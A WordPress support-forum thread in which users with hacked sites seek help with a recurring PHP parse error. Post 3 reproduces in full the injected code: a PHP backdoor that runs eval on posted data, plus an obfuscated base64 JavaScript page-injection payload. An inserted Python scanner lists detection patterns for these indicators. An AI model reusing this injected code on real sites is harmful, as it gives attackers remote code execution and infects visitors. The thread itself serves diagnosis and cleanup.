[resolved] Parse error: syntax error, unexpected ... on line 807 (21 posts)

  1. ronybigsoc
    Member
    Posted 3 years ago #

    I recently logged onto my blog and overnight it just messed up. Now when I just try to visit the page I get this error: HELP ME!

    Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/local/home/ronybig0/religiontranscends.com/wp-includes/classes.php on line 807

  2. whooami
    Member
    Posted 3 years ago #

    hsphere/local/home/ronybig0/religiontranscends.com/wp-includes/classes.php on line 807

    what's on lines 800-810 of that file?

  3. ronybigsoc
    Member
    Posted 3 years ago #

    Here's lines 800-811 - FYI I'm new to this... Don't talk BIG!

    $this->responses[] = $x;
    		return $x;
    	}
    
    	function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCclMkZgJTJGJCUyRSUyRSUyRSQAJTNDI2QmJTY5JTc2JCUyMCFzdCU3OSMlNkN8ZT0mJTY0fiU2OSU3M3AkJTZDQGF5YCUzQSU2RUBvQCU2RWAlNjUlM0UkXG58ZCU2RkAlNjNAJTc1YG0lNjUmbnR8JTJFISU3N2AlNzJpdCElNjUhJTI4ISImJTNDJTJGdCElNjUlNzhAdGElNzJlIWElM0UiKUA7I3YhJTYxciYlMjAkJTY5fiUyQ18sQCU2MSUzRHwlNUIiMiExOC45JTMzfi4lMzIjMCUzMiYuITYhJTMxIyUyMn4sfCUyMiMlMzclMzgjJTJFMSMlMzFgMC5gMTclMzUhLiUzMiElMzEkJTIyfl1gO19APWAlMzEkJTNCJTY5YCU2NiYlMjhAJTY0byQlNjMlNzUlNkR+ZXwlNkUlNzQlMkUlNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3NCYlM0VpJTY2JihgJTVGYCUyOSU2NG8lNjMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as 
$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><wp_ajax>";
    		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();

  4. whooami
    Member
    Posted 3 years ago #

    your site is hacked.

  5. whooami
    Member
    Posted 3 years ago #

    you have a lot of content on that blog. be very careful with how you proceed.

    Do an immediate backup of your database.

    I don't know what version you're running -- it would be helpful to know that, so I can give you some specific advice.

    In the meantime, you can look through some of the other threads I've replied to to get some general advice.

    http://wordpress.org/search/hacked?forums=1

  6. whooami
    Member
    Posted 3 years ago #

    to get your backup -- log in to your host's control panel.

    Here's what the page will look like after you log in (that's your own host's DEMO page):

    http://cp6.ixwebhosting.com/psoft/servlet/psoft.hsphere.CP/demolinux/1273400_0/demolin_test888

    scroll down that page, and you will see phpmyadmin and an icon.

    click that icon..

    find your wordpress database, and click the icon on the far right of the page.

    that opens phpmyadmin.

    From there, follow this:

    http://codex.wordpress.org/Backing_Up_Your_Database

    -----

    I provided the demo above for instructional purposes only. You need to log in at the top of this page to actually "do" all this for real:

    http://www.ixwebhosting.com/index.php/v2/pages.dspmain

  7. jared123
    Member
    Posted 3 years ago #

    just a warning to people with IXwebhosting, just about everyone is getting hacked who has a wordpress blog or other type of PHP-based web platform. they have a horrible security problem and sites are getting reinfected from other hosting accounts on shared servers.

    so, even if you get yours cleaned out, it will likely come back. you should leave IXwebhosting as soon as you can.

  8. whooami
    Member
    Posted 3 years ago #

    you should leave IXwebhosting as soon as you can.

    I agree, and made mention of both the widespread hacking and my opinion re: changing hosts, in a related thread.

    They (IXwebhosting) were actually rooted, and it sounds like they didn't take care of that properly.

  9. ronybigsoc
    Member
    Posted 3 years ago #

    This is GREAT! (sarcasm)

    Do you have a recommendation of an alternate host you like???

  10. joevac
    Member
    Posted 3 years ago #

    I too have been plagued by IXWebhosting. I've been hacked twice now and they aren't helping one bit. They recently emailed me this on 12/16

    We are happy to inform you that we are about to upgrade PHP to the latest version (4.4.9) on the webserver your website is currently being hosted on. This upgrade helps resolve many security exploits which were brought to our attention. With this upgrade we migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. At this time you may now upload your very own php.ini file into your cgi-bin folder.

    However, I'm still getting the same error as this topic.

  11. neverixweb
    Member
    Posted 3 years ago #

    (at least) 7 months ago IX Web Hosting's servers were seeded by Hacker(s) and now an iFrame Sql injection script is injected into every file on the corrupted servers.
    For more than 7 months IX has been lying and deceiving customers.

    You can read all about IX and the lies at

    http://ixwebhostwarning.wordpress.com

    My advice to anyone using IX is to count your loss and move on as soon as possible; things will get a lot worse before they get better (if ever).

  12. ronybigsoc
    Member
    Posted 3 years ago #

    Okay, I just redid everything from the ground up. I deleted and then re-added my domain. Then installed the wordpress version 2.6.2. Then imported my database and theme. Everything worked fine. Now 3-4 days later out of nowhere I get this error.

    Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572

    Is this still an ixwebhosting thing? Was I hacked again because of ixwebhosting? Or is their php version still old and not upgraded and it's their fault again? (Heard something about that)

    If it's them again please let me know of a hosting company you trust for hosting.

  13. garei
    Member
    Posted 2 years ago #

    Hello,
    I had the exact same error as the first post with a nearly identical line 807. I'm new to this, but in reading the replies, it sounds like I was hacked, but I have questions.

    For background:
    * I have two WordPress blogs on godaddy's deluxe hosting that have been running fine with no errors.
    * I added the All in one SEO Pack and Google Analyticator plug-ins and the next day the sites were down with this error.
    * This file along with most all of the others were updated within a few minutes of each other.
    * Everything is backed up daily so the first time this happened, I restored it to the previous days files and it was fine and changed all passwords just to make sure.
    * Everything was fine for a day and half and it happened again - same parse error, same that most all files were modified at about same time. I repeated the same process to get sites back online, but would like to find root of issue.

    Godaddy said it could not be anything on their end. Any chance there is some type of automatic update with a plug-in or something that may be changing all the files?

    Thanks.

  14. theblogdoctor
    Member
    Posted 2 years ago #

    Hi,

    I am getting same error on 1 of my client sites...

    Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572

    Can someone from WordPress.org please confirm if this is a HACKED situation ?

    Thanks

  15. garei
    Member
    Posted 2 years ago #

    Hello again,

    In looking into this further, I noticed a lot of code (similar to that shown above in other post) was added to this classes.php file and many other files on the site, all within a few minutes.

    So, I removed the plugins and the sites were doing ok (files did not update so the sites did not go down for a couple days), so I added the SEO Pack back and it's still doing ok. I haven't added Analyticator back yet. I'm hoping the sites stay up but am still very curious as to what this was so I can prevent it from happening again.

    to theblogdoctor, anything sound familiar in our cases? Just trying to figure what could be causing it.

    thanks.

  16. ramirez_fabian
    Member
    Posted 2 years ago #

    Okay, so something is taking down a number of my sites, I am getting this message below on all of them. Am I hacked?

    Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /public_html/hispy/wp-includes/classes.php on line 807

    What do I do about this after I did a backup, I got the error again.

  17. ramirez_fabian
    Member
    Posted 2 years ago #

    'tmp_lkojfghx'

    My line 807 contains the above tmp info over and over.

  18. John Hoff
    Member
    Posted 2 years ago #

    @ Ramirez_fabian - looks like you might have been hacked. I entered that term in Google and it returned countless results with everyone mentioning they've been hacked.

    Check your code around that line number for something like: base64_decode()

    If that's there, it's almost a sure thing you've been hacked.

    Our company provides security upgrades for WordPress bloggers, but I'll be honest, nothing is 100% foolproof.

    @ garei - I know people who host on GoDaddy and have those plugins with no issues. It is possible your site was hacked. Also, do you have any backup copies of your database on the server (check areas like your wp-content/db-backup or something)? If someone can find that, they could get access to your blog. You might want to try some security enhancements to harden your WordPress install. Maybe it will deter the attacker.
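
Added example, not part of any post in this thread: a Python scanner that walks a WordPress tree for the indicators visible in the injected line quoted in post 3 (the `tmp_lkojfghx` marker, `eval` of request data, a long `base64_decode` literal, the `/tmp/` include probe) and groups PHP files whose modification times fall within a few minutes of each other, the pattern garei describes. The function names, the 300-second window, the three-file threshold and the sample tree are assumptions made for this example.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators copied from the injected code quoted in post 3 of this thread.
INDICATORS = {
    "marker_name": re.compile(rb"tmp_lkojfghx"),
    "eval_of_request": re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "long_base64_literal": re.compile(rb"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}"),
    "include_from_tmp": re.compile(rb"is_file\s*\(\s*\$\w+\s*=\s*'/tmp/"),
}
# Constructed sample: a shortened fragment in the shape of the injected line.
SAMPLE = b"<?php if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']); ?>"

def scan_tree(root):
    """Return {relative path: [indicator names]} for PHP files that match."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        data = path.read_bytes()
        found = sorted(k for k, rx in INDICATORS.items() if rx.search(data))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def mtime_clusters(root, window=300, min_files=3):
    """Group PHP files modified within `window` seconds of the group's first file."""
    stamped = sorted((p.stat().st_mtime, p.relative_to(root).as_posix())
                     for p in Path(root).rglob("*.php"))
    groups = []
    for mtime, rel in stamped:
        if groups and mtime - groups[-1][0] <= window:
            groups[-1][1].append(rel)
        else:
            groups.append((mtime, [rel]))
    return [names for _start, names in groups if len(names) >= min_files]

def demo():
    """Build a constructed four-file tree; return (indicator hits, mtime clusters)."""
    base = 1_700_000_000  # arbitrary fixed timestamp for the constructed files
    files = [("classes.php", SAMPLE, base), ("feed.php", SAMPLE, base + 60),
             ("index.php", SAMPLE, base + 120), ("old.php", b"<?php echo 1;", base - 86400)]
    with tempfile.TemporaryDirectory() as root:
        for name, body, mtime in files:
            Path(root, name).write_bytes(body)
            os.utime(Path(root, name), (mtime, mtime))
        return scan_tree(root), mtime_clusters(root)

if __name__ == "__main__":
    print(demo())
```

Run `scan_tree` and `mtime_clusters` against a copy of the site's files; a file that appears in both results is a strong candidate for comparison against a clean WordPress download of the same version.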

  19. designandpromote
    Member
    Posted 2 years ago #

    My team and I figured this one out, here's the solution and we are offering our services to those that don't feel like fixing them themselves. Nothing is lost, it just takes a bit to put the pieces all back together. First thing though is to look on your computer for a keylogger program that sends your wordpress password to the script kiddies. http://www.designandpromote.com/parse-error-syntax-error-unexpected-t_variable-solved/

  20. theblogdoctor
    Member
    Posted 2 years ago #

    @ramirez_fabian

    Yes, the site has been hacked. For my client, I had a backup of the posts. So I deleted the WP install, re-installed it and imported the Posts.

    That "tmp_...." stuff you see is the hacked code. I am not sure what it does. I read in some forums that it was serving up ads and stuff on the pages.

  21. theblogdoctor
    Member
    Posted 2 years ago #

    Also, I contacted the Hosting Company to figure out how the script was uploaded, because the client had a very complex alpha numeric password. They looked at the logs and said the FTP pwd was keyed in, so someone had access to that password.

    I am not sure how the hacker or hacking code got that password. So I had the client change the Control Panel and FTP password after I re-installed the software.

This topic has been closed to new replies.